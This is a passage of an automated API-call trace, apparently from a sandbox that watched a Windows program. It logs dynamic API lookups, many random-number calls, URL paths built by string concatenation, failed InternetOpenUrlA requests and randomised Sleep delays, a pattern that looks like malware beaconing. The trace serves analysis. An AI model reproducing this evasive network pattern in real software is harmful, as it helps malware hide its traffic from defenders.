lpString2="/Iffdo824sXzd0988s8bgVal1S5pt45zumki9/aZraeiZ9xgc4o9vgj34xwpdtbisi9mt/rci5XsdVnbiPmmp7m7dS88fq756hnpna0uEMBh6rq/gv8jtoifkJ8vbtcvzvpskcij08gbxUonbrkhpijj/3fzBgeofqy8e4tb585mjwnn7qv/" | out: lpString1="\x04/Iffdo824sXzd0988s8bgVal1S5pt45zumki9/aZraeiZ9xgc4o9vgj34xwpdtbisi9mt/rci5XsdVnbiPmmp7m7dS88fq756hnpna0uEMBh6rq/gv8jtoifkJ8vbtcvzvpskcij08gbxUonbrkhpijj/3fzBgeofqy8e4tb585mjwnn7qv/") returned="\x04/Iffdo824sXzd0988s8bgVal1S5pt45zumki9/aZraeiZ9xgc4o9vgj34xwpdtbisi9mt/rci5XsdVnbiPmmp7m7dS88fq756hnpna0uEMBh6rq/gv8jtoifkJ8vbtcvzvpskcij08gbxUonbrkhpijj/3fzBgeofqy8e4tb585mjwnn7qv/" [0272.582] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0272.583] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/Iffdo824sXzd0988s8bgVal1S5pt45zumki9/aZraeiZ9xgc4o9vgj34xwpdtbisi9mt/rci5XsdVnbiPmmp7m7dS88fq756hnpna0uEMBh6rq/gv8jtoifkJ8vbtcvzvpskcij08gbxUonbrkhpijj/3fzBgeofqy8e4tb585mjwnn7qv/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0272.583] GetProcessHeap () returned 0x440000 [0272.583] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0272.583] GetProcessHeap () returned 0x440000 [0272.583] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01e50 | out: hHeap=0x440000) returned 1 [0272.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0272.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0272.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0272.584] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0272.584] Sleep (dwMilliseconds=0x1c60f) [0272.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0272.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.730] GetProcessHeap () returned 0x440000 [0272.730] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b330 [0272.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b331, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1b331) returned 0x0 [0272.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b359, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a1b359) returned 0x0 [0272.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.745] GetProcessHeap () returned 0x440000 [0272.745] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0272.745] lstrcpyA (in: lpString1=0x473560, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0272.745] lstrcatA (in: lpString1="\x81\x03", lpString2="/5j3ctajgfnexoq0m5Vx10crlmmbuuJypng8i1mN/3mxj3a84t1fhI8srvoixgqw/" | out: lpString1="\x81\x03/5j3ctajgfnexoq0m5Vx10crlmmbuuJypng8i1mN/3mxj3a84t1fhI8srvoixgqw/") returned="\x81\x03/5j3ctajgfnexoq0m5Vx10crlmmbuuJypng8i1mN/3mxj3a84t1fhI8srvoixgqw/" [0272.745] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0272.745] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/5j3ctajgfnexoq0m5Vx10crlmmbuuJypng8i1mN/3mxj3a84t1fhI8srvoixgqw/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0272.745] GetProcessHeap () returned 0x440000 [0272.745] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0272.745] GetProcessHeap () returned 0x440000 [0272.745] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b330 | out: hHeap=0x440000) returned 1 [0272.745] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0272.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0272.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0272.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0272.746] Sleep (dwMilliseconds=0x178f1) [0272.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0272.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.938] GetProcessHeap () returned 0x440000 [0272.938] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4eb0 [0272.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4eb1, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4d4eb1) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ecb, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d4ecb) returned 0x0 [0272.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: 